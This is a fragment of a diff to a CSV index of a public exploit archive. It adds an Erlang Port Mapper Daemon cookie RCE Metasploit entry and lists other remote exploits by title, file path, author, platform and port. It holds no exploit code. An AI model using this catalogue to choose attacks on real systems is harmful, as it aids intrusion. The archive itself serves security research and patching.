 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17018,6 +17023,7 @@ id,file,description,date,author,type,platform,port
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
+46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,